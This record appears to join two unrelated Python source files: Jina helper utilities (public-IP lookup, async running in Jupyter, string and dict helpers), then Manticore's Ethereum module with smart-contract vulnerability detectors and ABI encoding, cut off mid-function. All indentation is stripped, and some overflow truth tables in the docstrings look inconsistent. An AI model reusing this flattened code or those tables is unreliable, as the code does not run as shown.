:param timeout: the seconds to wait until return None.
:return: Public IP address.
.. warning::
Setting :param:`timeout` to a large number will block the Flow.
"""
import urllib.request
results = []
def _get_ip(url):
try:
req = urllib.request.Request(url, headers={'User-Agent': 'Mozilla/5.0'})
with urllib.request.urlopen(req, timeout=timeout) as fp:
_ip = fp.read().decode()
results.append(_ip)
except:
pass  # intentionally ignored, the public IP is simply not shown
ip_server_list = [
'https://api.ipify.org',
'https://ident.me',
'https://checkip.amazonaws.com/',
]
threads = []
for idx, ip in enumerate(ip_server_list):
t = threading.Thread(target=_get_ip, args=(ip,))
threads.append(t)
t.start()
for t in threads:
t.join(timeout)
for r in results:
if r:
return r
def convert_tuple_to_list(d: Dict):
"""
Convert all the tuple type values from a dict to list.
:param d: Dict type of data.
"""
for k, v in d.items():
if isinstance(v, tuple):
d[k] = list(v)
elif isinstance(v, dict):
convert_tuple_to_list(v)
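# A tiny sketch of the in-place conversion above (the sample dict is made up):
#
#     cfg = {'shape': (3, 4), 'nested': {'ids': (1, 2, 3)}}
#     convert_tuple_to_list(cfg)
#     # cfg is now {'shape': [3, 4], 'nested': {'ids': [1, 2, 3]}}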
def is_jupyter() -> bool: # pragma: no cover
"""
Check if we're running in a Jupyter notebook, using the magic command `get_ipython` that is only available in Jupyter.
:return: True if run in a Jupyter notebook else False.
"""
try:
get_ipython # noqa: F821
except NameError:
return False
shell = get_ipython().__class__.__name__ # noqa: F821
if shell == 'ZMQInteractiveShell':
return True # Jupyter notebook or qtconsole
elif shell == 'Shell':
return True # Google colab
elif shell == 'TerminalInteractiveShell':
return False # Terminal running IPython
else:
return False # Other type (?)
def run_async(func, *args, **kwargs):
"""Generalized asyncio.run for jupyter notebook.
When running inside Jupyter, an event loop already exists and cannot be stopped or killed.
Directly calling asyncio.run will fail, as "This function cannot be called when another asyncio event loop
is running in the same thread".
.. see_also:
https://stackoverflow.com/questions/55409641/asyncio-run-cannot-be-called-from-a-running-event-loop
:param func: function to run
:param args: parameters
:param kwargs: key-value parameters
:return: asyncio.run(func)
"""
class _RunThread(threading.Thread):
"""Create a running thread when in Jupyter notebook."""
def run(self):
"""Run given `func` asynchronously."""
self.result = asyncio.run(func(*args, **kwargs))
try:
loop = asyncio.get_running_loop()
except RuntimeError:
loop = None
if loop and loop.is_running():
# eventloop already exist
# running inside Jupyter
if is_jupyter():
thread = _RunThread()
thread.start()
thread.join()
try:
return thread.result
except AttributeError:
from .excepts import BadClient
raise BadClient(
'something wrong when running the eventloop, result can not be retrieved'
)
else:
raise RuntimeError(
'you have an eventloop running but not using Jupyter/ipython, '
'this may mean you are using Jina with another integration; if so, you '
'may want to use Client/Flow(asyncio=True). If not, then '
'please report this issue here: https://github.com/jina-ai/jina'
)
else:
return asyncio.run(func(*args, **kwargs))
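# A minimal sketch of calling `run_async` from a plain script (the coroutine is a stand-in):
# outside Jupyter there is no running loop, so it falls through to `asyncio.run`.
#
#     async def _double(x):
#         return x * 2
#
#     print(run_async(_double, 21))   # 42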
def slugify(value):
"""
Normalize a string: strip it, convert spaces to underscores, and remove characters that are not alphanumerics, underscores, hyphens, or dots.
:param value: Original string.
:return: Processed string.
"""
s = str(value).strip().replace(' ', '_')
return re.sub(r'(?u)[^-\w.]', '', s)
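# Examples of the normalization above:
#
#     slugify('Hello World!')    # -> 'Hello_World'
#     slugify('  my.flow v2 ')   # -> 'my.flow_v2'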
def is_yaml_filepath(val) -> bool:
"""
Check if the file is YAML file.
:param val: Path of target file.
:return: True if the file is YAML else False.
"""
r = r'^[/\w\-\_\.]+\.ya?ml$'
return re.match(r, val.strip()) is not None
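# Examples of the extension check above:
#
#     is_yaml_filepath('flow.yml')        # True
#     is_yaml_filepath('conf/flow.yaml')  # True
#     is_yaml_filepath('flow.json')       # False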
def download_mermaid_url(mermaid_url, output) -> None:
"""
Download the jpg image from mermaid_url.
:param mermaid_url: The URL of the image.
:param output: A filename specifying the name of the image to be created, the suffix svg/jpg determines the file type of the output image.
"""
from urllib.request import Request, urlopen
try:
req = Request(mermaid_url, headers={'User-Agent': 'Mozilla/5.0'})
with open(output, 'wb') as fp:
fp.write(urlopen(req).read())
except:
from jina.logging.predefined import default_logger
default_logger.error(
'can not download image, please check your graph and the network connections'
)
def find_request_binding(target):
"""Find `@request` decorated methods in a class.
:param target: the target class to check
:return: a dictionary with key as request type and value as method name
"""
import ast, inspect
from . import __default_endpoint__
res = {}
def visit_function_def(node):
for e in node.decorator_list:
req_name = ''
if isinstance(e, ast.Call) and e.func.id == 'requests':
req_name = e.keywords[0].value.s
elif isinstance(e, ast.Name) and e.id == 'requests':
req_name = __default_endpoint__
if req_name:
if req_name in res:
raise ValueError(
f'you already bind `{res[req_name]}` with `{req_name}` request'
)
else:
res[req_name] = node.name
V = ast.NodeVisitor()
V.visit_FunctionDef = visit_function_def
V.visit(compile(inspect.getsource(target), '?', 'exec', ast.PyCF_ONLY_AST))
return res
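# A rough sketch of what the AST scan above returns (the Executor-style class is hypothetical
# and assumes the `requests` decorator from this package is in scope):
#
#     class MyExec:
#         @requests(on='/index')
#         def index(self, **kwargs):
#             pass
#
#         @requests
#         def fallback(self, **kwargs):
#             pass
#
#     find_request_binding(MyExec)
#     # -> {'/index': 'index', <default endpoint>: 'fallback'}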
def dunder_get(_dict: Any, key: str) -> Any:
"""Returns value for a specified dunderkey
A "dunderkey" is just a fieldname that may or may not contain
double underscores (dunderscores!) for referencing nested keys in
a dict. eg::
>>> data = {'a': {'b': 1}}
>>> dunder_get(data, 'a__b')
1
key 'b' can be referenced as 'a__b'
:param _dict: (dict, list, struct or object) which we want to index into
:param key: (str) that represents a first level or nested key in the dict
:return: (mixed) value corresponding to the key
"""
try:
part1, part2 = key.split('__', 1)
except ValueError:
part1, part2 = key, ''
try:
part1 = int(part1) # parse int parameter
except ValueError:
pass
from google.protobuf.struct_pb2 import ListValue
from google.protobuf.struct_pb2 import Struct
from google.protobuf.pyext._message import MessageMapContainer
if isinstance(part1, int):
result = _dict[part1]
elif isinstance(_dict, (Iterable, ListValue)):
result = _dict[part1]
elif isinstance(_dict, (dict, Struct, MessageMapContainer)):
if part1 in _dict:
result = _dict[part1]
else:
result = None
else:
result = getattr(_dict, part1)
return dunder_get(result, part2) if part2 else result
if False:
from fastapi import FastAPI
def extend_rest_interface(app: 'FastAPI') -> 'FastAPI':
"""Extend Jina built-in FastAPI instance with customized APIs, routing, etc.
:param app: the built-in FastAPI instance given by Jina
:return: the extended FastAPI instance
.. highlight:: python
.. code-block:: python
def extend_rest_interface(app: 'FastAPI'):
@app.get('/extension1')
async def root():
return {"message": "Hello World"}
return app
"""
return app
def get_ci_vendor() -> Optional[str]:
from jina import __resources_path__
with open(os.path.join(__resources_path__, 'ci-vendors.json')) as fp:
all_cis = json.load(fp)
for c in all_cis:
if isinstance(c['env'], str) and c['env'] in os.environ:
return c['constant']
elif isinstance(c['env'], dict):
for k, v in c['env'].items():
if os.environ.get(k, None) == v:
return c['constant']
elif isinstance(c['env'], list):
for k in c['env']:
if k in os.environ:
return c['constant']
|
ethereum.py
|
from . import abitypes
import uuid
import numbers
import random
import hashlib
import binascii
import string
import re
import os
from . import Manticore
from .manticore import ManticoreError
from .core.smtlib import ConstraintSet, Operators, solver, issymbolic, istainted, taint_with, get_taints, BitVec, Constant, operators, Array, ArrayVariable
from .core.smtlib.visitors import simplify
from .platforms import evm
from .core.state import State
from .utils.helpers import istainted, issymbolic
import tempfile
from subprocess import Popen, PIPE, check_output
from multiprocessing import Process, Queue
from Queue import Empty as EmptyQueue
import sha3
import json
import logging
import StringIO
import cPickle as pickle
from .core.plugin import Plugin
from functools import reduce
from contextlib import contextmanager
logger = logging.getLogger(__name__)
class EthereumError(ManticoreError):
pass
class DependencyError(EthereumError):
def __init__(self, lib_names):
super(DependencyError, self).__init__("You must pre-load and provide library addresses { lib_name: address, ... } for %r" % lib_names)
self.lib_names = lib_names
class NoAliveStates(EthereumError):
pass
################ Detectors ####################
class Detector(Plugin):
@property
def name(self):
return self.__class__.__name__.split('.')[-1]
def get_findings(self, state):
return state.context.setdefault('{:s}.findings'.format(self.name), set())
@contextmanager
def locked_global_findings(self):
with self.manticore.locked_context('{:s}.global_findings'.format(self.name), set) as global_findings:
yield global_findings
@property
def global_findings(self):
with self.locked_global_findings() as global_findings:
return global_findings
def add_finding(self, state, address, pc, finding, init):
self.get_findings(state).add((address, pc, finding, init))
with self.locked_global_findings() as gf:
gf.add((address, pc, finding, init))
#Fixme for ever broken logger
#logger.warning(finding)
def add_finding_here(self, state, finding):
address = state.platform.current_vm.address
pc = state.platform.current_vm.pc
at_init = state.platform.current_transaction.sort == 'CREATE'
self.add_finding(state, address, pc, finding, at_init)
def _save_current_location(self, state, finding):
address = state.platform.current_vm.address
pc = state.platform.current_vm.pc
location = (address, pc, finding)
hash_id = hashlib.sha1(str(location)).hexdigest()
state.context.setdefault('{:s}.locations'.format(self.name), {})[hash_id] = location
return hash_id
def _get_location(self, state, hash_id):
return state.context.setdefault('{:s}.locations'.format(self.name), {})[hash_id]
def _get_src(self, address, pc):
return self.manticore.get_metadata(address).get_source_for(pc)
class FilterFunctions(Plugin):
def __init__(self, regexp=r'.*', mutability='both', depth='both', fallback=False, include=True, **kwargs):
"""
Constrain input based on function metadata. Include or avoid functions selected by the specified criteria.
Examples:
#Do not explore any human transactions that end up calling a constant function
no_human_constant = FilterFunctions(depth='human', mutability='constant', include=False)
#At human tx depth only accept synthetic check functions
only_tests = FilterFunctions(regexp=r'mcore_.*', depth='human', include=True)
:param regexp: a regular expression over the name of the function; '.*' will match all functions
:param mutability: mutable, constant or both will match functions declared in the abi to be of such class
:param depth: match functions in internal transactions, in human initiated transactions or in both types
:param fallback: if True include the fallback function. Hash will be 00000000 for it
:param include: if False exclude the selected functions, if True include them
"""
super(FilterFunctions, self).__init__(**kwargs)
depth = depth.lower()
if depth not in ('human', 'internal', 'both'):
raise ValueError("depth must be one of 'human', 'internal' or 'both'")
mutability = mutability.lower()
if mutability not in ('mutable', 'constant', 'both'):
raise ValueError("mutability must be one of 'mutable', 'constant' or 'both'")
#fixme better names for member variables
self._regexp = regexp
self._mutability = mutability
self._depth = depth
self._fallback = fallback
self._include = include
def will_open_transaction_callback(self, state, tx):
world = state.platform
tx_cnt = len(world.all_transactions)
# Constrain input only once per tx, per plugin
if state.context.get('constrained%d' % id(self), 0) != tx_cnt:
state.context['constrained%d' % id(self)] = tx_cnt
if self._depth == 'human' and not tx.is_human:
return
if self._depth == 'internal' and tx.is_human:
return
#Get metadata, if any, for the target address of the current tx
md = self.manticore.get_metadata(tx.address)
if md is None:
return
#Let's compile the list of interesting hashes
selected_functions = []
for func_hsh in md.hashes:
if func_hsh == '00000000':
continue
abi = md.get_abi(func_hsh)
func_name = md.get_func_name(func_hsh)
if self._mutability == 'constant' and not abi.get('constant', False):
continue
if self._mutability == 'mutable' and abi.get('constant', False):
continue
if not re.match(self._regexp, func_name):
continue
selected_functions.append(func_hsh)
if self._fallback:
selected_functions.append('00000000')
if self._include:
# constrain the input so it can take only the interesting values
constraint = reduce(Operators.OR, map(lambda x: tx.data[:4] == binascii.unhexlify(x), selected_functions))
state.constrain(constraint)
else:
#Exclude all the selected hashes
for func_hsh in md.hashes:
if func_hsh in selected_functions:
constraint = Operators.NOT(tx.data[:4] == binascii.unhexlify(func_hsh))
state.constrain(constraint)
class DetectInvalid(Detector):
def __init__(self, only_human=True, **kwargs):
"""
Detects INVALID instructions.
INVALID instructions are originally designated to signal exceptional code.
As in practice the INVALID instruction is used in different ways, this
detector may generate a great deal of false positives.
:param only_human: if True report only INVALID at depth 0 transactions
"""
super(DetectInvalid, self).__init__(**kwargs)
self._only_human = only_human
def did_evm_execute_instruction_callback(self, state, instruction, arguments, result_ref):
mnemonic = instruction.semantics
result = result_ref.value
if mnemonic == 'INVALID':
if not self._only_human or state.platform.current_transaction.depth == 0:
self.add_finding_here(state, "INVALID intruction")
class DetectIntegerOverflow(Detector):
'''
Detects potential overflow and underflow conditions on ADD and SUB instructions.
'''
def _save_current_location(self, state, finding, condition):
address = state.platform.current_vm.address
pc = state.platform.current_vm.pc
at_init = state.platform.current_transaction.sort == 'CREATE'
location = (address, pc, finding, at_init, condition)
hash_id = hashlib.sha1(str(location)).hexdigest()
state.context.setdefault('{:s}.locations'.format(self.name), {})[hash_id] = location
return hash_id
def _get_location(self, state, hash_id):
return state.context.setdefault('{:s}.locations'.format(self.name), {})[hash_id]
@staticmethod
def _signed_sub_overflow(state, a, b):
'''
Sign-extend the values to 512 bits and check whether the result can be represented
in 256 bits. The following is a 32-bit excerpt of this condition:
a - b -80000000 -3fffffff -00000001 +00000000 +00000001 +3fffffff +7fffffff
+80000000 False False False False True True True
+c0000001 False False False False False False True
+ffffffff False False False False False False False
+00000000 True False False False False False False
+00000001 True False False False False False False
+3fffffff True False False False False False False
+7fffffff True True True False False False False
'''
sub = Operators.SEXTEND(a, 256, 512) - Operators.SEXTEND(b, 256, 512)
cond = Operators.OR(sub < -(1 << 255), sub >= (1 << 255))
return cond
@staticmethod
def _signed_add_overflow(state, a, b):
'''
Sign-extend the values to 512 bits and check whether the result can be represented
in 256 bits. The following is a 32-bit excerpt of this condition:
a + b -80000000 -3fffffff -00000001 +00000000 +00000001 +3fffffff +7fffffff
+80000000 True True True False False False False
+c0000001 True False False False False False False
+ffffffff True False False False False False False
+00000000 False False False False False False False
+00000001 False False False False False False True
+3fffffff False False False False False False True
+7fffffff False False False False True True True
'''
add = Operators.SEXTEND(a, 256, 512) + Operators.SEXTEND(b, 256, 512)
cond = Operators.OR(add < -(1 << 255), add >= (1 << 255))
return cond
@staticmethod
def _unsigned_sub_overflow(state, a, b):
'''
Unsigned subtraction underflows (wraps) exactly when b > a; no extension is needed.
The following is a 32-bit excerpt of this condition:
a - b ffffffff bfffffff 80000001 00000000 00000001 3ffffffff 7fffffff
ffffffff True True True False True True True
bfffffff True True True False False True True
80000001 True True True False False True True
00000000 False False False False False True False
00000001 True False False False False True False
ffffffff True True True True True True True
7fffffff True True True False False True False
'''
cond = Operators.UGT(b, a)
return cond
@staticmethod
def _unsigned_add_overflow(state, a, b):
'''
Zero-extend the values to 512 bits and check whether the result can be represented
in 256 bits. The following is a 32-bit excerpt of this condition:
a + b ffffffff bfffffff 80000001 00000000 00000001 3ffffffff 7fffffff
ffffffff True True True False True True True
bfffffff True True True False False True True
80000001 True True True False False True True
00000000 False False False False False True False
00000001 True False False False False True False
ffffffff True True True True True True True
7fffffff True True True False False True False
'''
add = Operators.ZEXTEND(a, 512) + Operators.ZEXTEND(b, 512)
cond = Operators.UGE(add, 1 << 256)
return cond
@staticmethod
def _signed_mul_overflow(state, a, b):
'''
Sign-extend the values to 512 bits and check whether the result can be represented
in 256 bits. The following is a 32-bit excerpt of this condition:
a * b +00000000000000000 +00000000000000001 +0000000003fffffff +0000000007fffffff +00000000080000001 +000000000bfffffff +000000000ffffffff
+0000000000000000 +0000000000000000 +0000000000000000 +0000000000000000 +0000000000000000 +0000000000000000 +0000000000000000 +0000000000000000
+0000000000000001 +0000000000000000 +0000000000000001 +000000003fffffff +000000007fffffff +0000000080000001 +00000000bfffffff +00000000ffffffff
+000000003fffffff +0000000000000000 +000000003fffffff *+0fffffff80000001 *+1fffffff40000001 *+1fffffffbfffffff *+2fffffff00000001 *+3ffffffec0000001
+000000007fffffff +0000000000000000 +000000007fffffff *+1fffffff40000001 *+3fffffff00000001 *+3fffffffffffffff *+5ffffffec0000001 *+7ffffffe80000001
+0000000080000001 +0000000000000000 +0000000080000001 *+1fffffffbfffffff *+3fffffffffffffff *+4000000100000001 *+600000003fffffff *+800000007fffffff
+00000000bfffffff +0000000000000000 +00000000bfffffff *+2fffffff00000001 *+5ffffffec0000001 *+600000003fffffff *+8ffffffe80000001 *+bffffffe40000001
+00000000ffffffff +0000000000000000 +00000000ffffffff *+3ffffffec0000001 *+7ffffffe80000001 *+800000007fffffff *+bffffffe40000001 *+fffffffe00000001
'''
mul = Operators.SEXTEND(a, 256, 512) * Operators.SEXTEND(b, 256, 512)
cond = Operators.OR(mul < -(1 << 255), mul >= (1 << 255))
return cond
@staticmethod
def _unsigned_mul_overflow(state, a, b):
'''
Zero-extend the values to 512 bits and check whether the result can be represented
in 256 bits. The following is a 32-bit excerpt of this condition:
a * b +00000000000000000 +00000000000000001 +0000000003fffffff +0000000007fffffff +00000000080000001 +000000000bfffffff +000000000ffffffff
+0000000000000000 +0000000000000000 +0000000000000000 +0000000000000000 +0000000000000000 +0000000000000000 +0000000000000000 +0000000000000000
+0000000000000001 +0000000000000000 +0000000000000001 +000000003fffffff +000000007fffffff +0000000080000001 +00000000bfffffff +00000000ffffffff
+000000003fffffff +0000000000000000 +000000003fffffff *+0fffffff80000001 *+1fffffff40000001 *+1fffffffbfffffff *+2fffffff00000001 *+3ffffffec0000001
+000000007fffffff +0000000000000000 +000000007fffffff *+1fffffff40000001 *+3fffffff00000001 *+3fffffffffffffff *+5ffffffec0000001 *+7ffffffe80000001
+0000000080000001 +0000000000000000 +0000000080000001 *+1fffffffbfffffff *+3fffffffffffffff *+4000000100000001 *+600000003fffffff *+800000007fffffff
+00000000bfffffff +0000000000000000 +00000000bfffffff *+2fffffff00000001 *+5ffffffec0000001 *+600000003fffffff *+8ffffffe80000001 *+bffffffe40000001
+00000000ffffffff +0000000000000000 +00000000ffffffff *+3ffffffec0000001 *+7ffffffe80000001 *+800000007fffffff *+bffffffe40000001 *+fffffffe00000001
'''
mul = Operators.ZEXTEND(a, 512) * Operators.ZEXTEND(b, 512)
cond = Operators.UGE(mul, 1 << 256)
return cond
def did_evm_execute_instruction_callback(self, state, instruction, arguments, result_ref):
result = result_ref.value
mnemonic = instruction.semantics
ios = False
iou = False
if mnemonic == 'ADD':
ios = self._signed_add_overflow(state, *arguments)
iou = self._unsigned_add_overflow(state, *arguments)
elif mnemonic == 'MUL':
ios = self._signed_mul_overflow(state, *arguments)
iou = self._unsigned_mul_overflow(state, *arguments)
elif mnemonic == 'SUB':
ios = self._signed_sub_overflow(state, *arguments)
iou = self._unsigned_sub_overflow(state, *arguments)
elif mnemonic == 'SSTORE':
where, what = arguments
if istainted(what, "SIGNED"):
for taint in get_taints(what, "IOS_.*"):
loc = self._get_location(state, taint[4:])
if state.can_be_true(loc[-1]):
self.add_finding(state, *loc[:-1])
else:
for taint in get_taints(what, "IOU_.*"):
loc = self._get_location(state, taint[4:])
if state.can_be_true(loc[-1]):
self.add_finding(state, *loc[:-1])
if mnemonic in ('SLT', 'SGT', 'SDIV', 'SMOD'):
result = taint_with(result, "SIGNED")
if state.can_be_true(ios):
id_val = self._save_current_location(state, "Signed integer overflow at %s instruction" % mnemonic, ios)
result = taint_with(result, "IOS_{:s}".format(id_val))
if state.can_be_true(iou):
id_val = self._save_current_location(state, "Unsigned integer overflow at %s instruction" % mnemonic, iou)
result = taint_with(result, "IOU_{:s}".format(id_val))
result_ref.value = result
class DetectUninitializedMemory(Detector):
'''
Detects uses of uninitialized memory
'''
def did_evm_read_memory_callback(self, state, offset, value):
initialized_memory = state.context.get('seth.detectors.initialized_memory', set())
cbu = True # Can be unknown
current_contract = state.platform.current_vm.address
for known_contract, known_offset in initialized_memory:
if current_contract == known_contract:
cbu = Operators.AND(cbu, offset != known_offset)
if state.can_be_true(cbu):
self.add_finding_here(state, "Potentially reading uninitialized memory at instruction (address: %r, offset %r)" % (current_contract, offset))
def did_evm_write_memory_callback(self, state, offset, value):
current_contract = state.platform.current_vm.address
# concrete or symbolic write
state.context.setdefault('seth.detectors.initialized_memory', set()).add((current_contract, offset))
class DetectUninitializedStorage(Detector):
'''
Detects uses of uninitialized storage
'''
def did_evm_read_storage_callback(self, state, address, offset, value):
if not state.can_be_true(value != 0):
# Uninitialized storage reads as zero, so a value that can only be zero is fine
return
# check if offset is known
cbu = True # Can be unknown
for known_address, known_offset in state.context.get('seth.detectors.initialized_storage', set()):
cbu = Operators.AND(cbu, Operators.OR(address != known_address, offset != known_offset))
if state.can_be_true(cbu):
self.add_finding_here(state, "Potentially reading uninitialized storage")
def did_evm_write_storage_callback(self, state, address, offset, value):
# concrete or symbolic write
state.context.setdefault('seth.detectors.initialized_storage', set()).add((address, offset))
def calculate_coverage(runtime_bytecode, seen):
''' Calculates what percentage of runtime_bytecode has been seen '''
count, total = 0, 0
bytecode = SolidityMetadata._without_metadata(runtime_bytecode)
for i in evm.EVMAsm.disassemble_all(bytecode):
if i.pc in seen:
count += 1
total += 1
if total == 0:
#No runtime_bytecode
return 0
return count * 100.0 / total
class SolidityMetadata(object):
def __init__(self, name, source_code, init_bytecode, runtime_bytecode, srcmap, srcmap_runtime, hashes, abi, warnings):
''' Contract metadata for Solidity-based contracts '''
self.name = name
self.source_code = source_code
self._init_bytecode = init_bytecode
self._runtime_bytecode = runtime_bytecode
self._hashes = hashes
self.abi = dict([(item.get('name', '{fallback}'), item) for item in abi])
self.warnings = warnings
self.srcmap_runtime = self.__build_source_map(self.runtime_bytecode, srcmap_runtime)
self.srcmap = self.__build_source_map(self.init_bytecode, srcmap)
def get_constructor_arguments(self):
for fun in self.abi.values():
if fun['type'] == 'constructor':
constructor_inputs = fun['inputs']
break
else:
constructor_inputs = ()
def process(spec):
if spec['type'].startswith('tuple'):
types = []
for component in spec['components']:
types.append(process(component))
return '({}){:s}'.format(','.join(types), spec['type'][5:])
else:
return spec['type']
inputs = {'components': constructor_inputs, 'type': 'tuple'}
return process(inputs)
def add_function(self, method_name_and_signature):
#TODO: use re, and check it's sane
name = method_name_and_signature.split('(')[0]
if name in self.abi:
raise EthereumError("Function already defined")
hsh = ABI.function_selector(method_name_and_signature)
self._hashes[method_name_and_signature] = hsh
input_types = method_name_and_signature.split('(')[1].split(')')[0].split(',')
output_types = method_name_and_signature.split(')')[1].split(',')
self.abi[name] = {'inputs': [{'type': ty} for ty in input_types],
'name': name,
'outputs': [{'type': ty} for ty in output_types]}
@staticmethod
def _without_metadata(bytecode):
end = None
if bytecode[-43: -34] == '\xa1\x65\x62\x7a\x7a\x72\x30\x58\x20' \
and bytecode[-2:] == '\x00\x29':
end = -9 - 32 - 2 # Size of metadata at the end of most contracts
return bytecode[:end]
def __build_source_map(self, bytecode, srcmap):
# https://solidity.readthedocs.io/en/develop/miscellaneous.html#source-mappings
new_srcmap = {}
bytecode = self._without_metadata(bytecode)
asm_offset = 0
asm_pos = 0
md = dict(enumerate(srcmap[asm_pos].split(':')))
byte_offset = int(md.get(0, 0)) # is the byte-offset to the start of the range in the source file
source_len = int(md.get(1, 0)) # is the length of the source range in bytes
file_index = int(md.get(2, 0)) # is the source index over sourceList
jump_type = md.get(3, None) # this can be either i, o or - signifying whether a jump instruction goes into a function, returns from a function or is a regular jump as part of e.g. a loop
pos_to_offset = {}
for i in evm.EVMAsm.disassemble_all(bytecode):
pos_to_offset[asm_pos] = asm_offset
asm_pos += 1
asm_offset += i.size
for asm_pos, md in enumerate(srcmap):
if len(md):
d = dict((p, k) for p, k in enumerate(md.split(':')) if k)
byte_offset = int(d.get(0, byte_offset))
source_len = int(d.get(1, source_len))
file_index = int(d.get(2, file_index))
jump_type = d.get(3, jump_type)
new_srcmap[pos_to_offset[asm_pos]] = (byte_offset, source_len, file_index, jump_type)
return new_srcmap
@property
def runtime_bytecode(self):
# Removes metadata from the tail of bytecode
return self._without_metadata(self._runtime_bytecode)
@property
def init_bytecode(self):
# Removes metadata from the tail of bytecode
return self._without_metadata(self._init_bytecode)
def get_source_for(self, asm_offset, runtime=True):
''' Solidity source code snippet related to the `asm_offset` evm bytecode offset.
If runtime is False, initialization bytecode source map is used
'''
if runtime:
srcmap = self.srcmap_runtime
else:
srcmap = self.srcmap
try:
beg, size, _, _ = srcmap[asm_offset]
except KeyError:
#asm_offset pointing outside the known bytecode
return ''
output = ''
nl = self.source_code[:beg].count('\n')
snippet = self.source_code[beg:beg + size]
for l in snippet.split('\n'):
output += ' %s %s\n' % (nl, l)
nl += 1
return output
@property
def signatures(self):
return dict(((b, a) for (a, b) in self._hashes.items()))
def get_abi(self, hsh):
func_name = self.get_func_name(hsh)
default_fallback_abi = {u'stateMutability': u'nonpayable', u'payable': False, u'type': u'fallback'}
return self.abi.get(func_name, default_fallback_abi)
def get_func_argument_types(self, hsh):
abi = self.get_abi(hsh)
return '(' + ','.join(x['type'] for x in abi.get('inputs', [])) + ')'
def get_func_return_types(self, hsh):
abi = self.get_abi(hsh)
return '(' + ','.join(x['type'] for x in abi.get('outputs', [])) + ')'
def get_func_name(self, hsh):
signature = self.signatures.get(hsh, '{fallback}()')
return signature.split('(')[0]
def get_func_signature(self, hsh):
return self.signatures.get(hsh)
def get_hash(self, method_name_and_signature):
#helper
return ABI.function_selector(method_name_and_signature)
@property
def functions(self):
return tuple(self.signatures.values()) + ('{fallback}()',)
@property
def hashes(self):
return tuple(self.signatures.keys()) + ('00000000',)
class ABI(object):
'''
This class contains methods to handle the ABI.
The Application Binary Interface is the standard way to interact with
contracts in the Ethereum ecosystem, both from outside the blockchain
and for contract-to-contract interaction.
'''
@staticmethod
def _type_size(ty):
''' Calculate `static` type size '''
if ty[0] in ('int', 'uint', 'bytesM', 'function'):
return 32
elif ty[0] == 'tuple':
result = 0
for ty_i in ty[1]:
result += ABI._type_size(ty_i)
return result
elif ty[0] == 'array':
rep = ty[1]
result = 32 # offset link
return result
elif ty[0] in ('bytes', 'string'):
result = 32 # offset link
return result
raise ValueError
@staticmethod
def function_call(type_spec, *args):
'''
Build transaction data from function signature and arguments
'''
m = re.match(r"(?P<name>[a-zA-Z_]+)(?P<type>\(.*\))", type_spec)
if not m:
raise EthereumError("Function signature expected")
result = ABI.function_selector(type_spec) # Funcid
result += ABI.serialize(m.group('type'), *args)
return result
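# A sketch of the resulting calldata layout: 4 selector bytes followed by the ABI-encoded
# arguments (the signature below is just an example):
#
#     data = ABI.function_call('set(uint256)', 0x2a)
#     # data[:4]  -> first 4 bytes of keccak-256('set(uint256)'), i.e. the function selector
#     # data[4:]  -> 32-byte big-endian encoding of 0x2a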
@staticmethod
def serialize(ty, *value, **kwargs):
'''
Serialize value using type specification in ty.
ABI.serialize('int256', 1000)
ABI.serialize('(int, int256)', 1000, 2000)
'''
try:
parsed_ty = abitypes.parse(ty)
except Exception as e:
# Catch and rebrand parsing errors
raise EthereumError(e.message)
if parsed_ty[0] != 'tuple':
if len(value) > 1:
raise ValueError
value = value[0]
result, dyn_result = ABI._serialize(parsed_ty, value)
return result + dyn_result
@staticmethod
def _serialize(ty, value, dyn_offset=None):
if dyn_offset is None:
dyn_offset = ABI._type_size(ty)
result = bytearray()
dyn_result = bytearray()
if ty[0] == 'int':
result += ABI._serialize_int(value, size=ty[1] / 8, padding=32 - ty[1] / 8)
elif ty[0] == 'uint':
result += ABI._serialize_uint(value, size=ty[1] / 8, padding=32 - ty[1] / 8)
elif ty[0] in ('bytes', 'string'):
result += ABI._serialize_uint(dyn_offset)
dyn_result += ABI._serialize_uint(len(value))
for byte in value:
dyn_result.append(byte)
elif ty[0] == 'function':
result = ABI._serialize_uint(value[0], 20)
result += value[1] + bytearray('\0' * 8)
assert len(result) == 32
elif ty[0] == 'tuple':
sub_result, sub_dyn_result = ABI._serialize_tuple(ty[1], value, dyn_offset)
result += sub_result
dyn_result += sub_dyn_result
elif ty[0] == 'array':
rep = ty[1]
base_type = ty[2]
sub_result, sub_dyn_result = ABI._serialize_array(rep, base_type, value, dyn_offset)
result += sub_result
dyn_result += sub_dyn_result
assert len(result) == ABI._type_size(ty)
return result, dyn_result
@staticmethod
def _serialize_tuple(types, value, dyn_offset=None):
result = bytearray()
dyn_result = bytearray()
for ty_i, value_i in zip(types, value):
result_i, dyn_result_i = ABI._serialize(ty_i, value_i, dyn_offset + len(dyn_result))
result += result_i
dyn_result += dyn_result_i
return result, dyn_result
@staticmethod
def _serialize_array(rep, base_type, value, dyn_offset=None):
result = ABI._serialize_uint(dyn_offset)
dyn_result = bytearray()
sub_result = bytearray()
sub_dyn_result = bytearray()
if rep is not None and len(value) != rep:
raise ValueError("More reps than values")
sub_result += ABI._serialize_uint(len(value))
for value_i in value:
result_i, dyn_result_i = ABI._serialize(base_type, value_i, dyn_offset + len(dyn_result))
sub_result += result_i
sub_dyn_result += dyn_result_i
dyn_result += sub_result
dyn_result += sub_dyn_result
return result, dyn_result
@staticmethod
def function_selector(method_name_and_signature):
'''
Makes a function hash id from a method signature
'''
s = sha3.keccak_256()
s.update(str(method_name_and_signature))
return bytearray(binascii.unhexlify(s.hexdigest()[:8]))
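# Example: the selector is the first 4 bytes of the keccak-256 hash of the canonical signature.
#
#     ABI.function_selector('transfer(address,uint256)')
#     # -> the 4 bytes a9 05 9c bb (the well-known ERC20 `transfer` selector)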
@staticmethod
def deserialize(type_spec, data):
try:
if isinstance(data, str):
data = bytearray(data)
assert isinstance(data, (bytearray, Array))
m = re.match(r"(?P<name>[a-zA-Z_]+)(?P<type>\(.*\))", type_spec)
if m and m.group('name'):
# Type has function name. Lets take the function id from the data
# This does not check that the encoded func_id is valid
# func_id = ABI.function_selector(type_spec)
result = (data[:4],)
ty = m.group('type')
result += (ABI._deserialize(abitypes.parse(ty), data[4:]),)
else:
# No function name, just types
ty = type_spec
result = ABI._deserialize(abitypes.parse(ty), data)
return result
except Exception as e:
raise EthereumError(e.message)
@staticmethod
def _deserialize(ty, buf, offset=0):
assert isinstance(buf, (bytearray, Array))
result = None
if ty[0] == 'int':
result = ABI._deserialize_int(buf[offset:offset + 32], nbytes=ty[1] / 8)
elif ty[0] == 'uint':
result = ABI._deserialize_uint(buf[offset:offset + 32], nbytes=ty[1] / 8)
elif ty[0] == 'bytesM':
result = buf[offset:offset + ty[1]]
elif ty[0] == 'function':
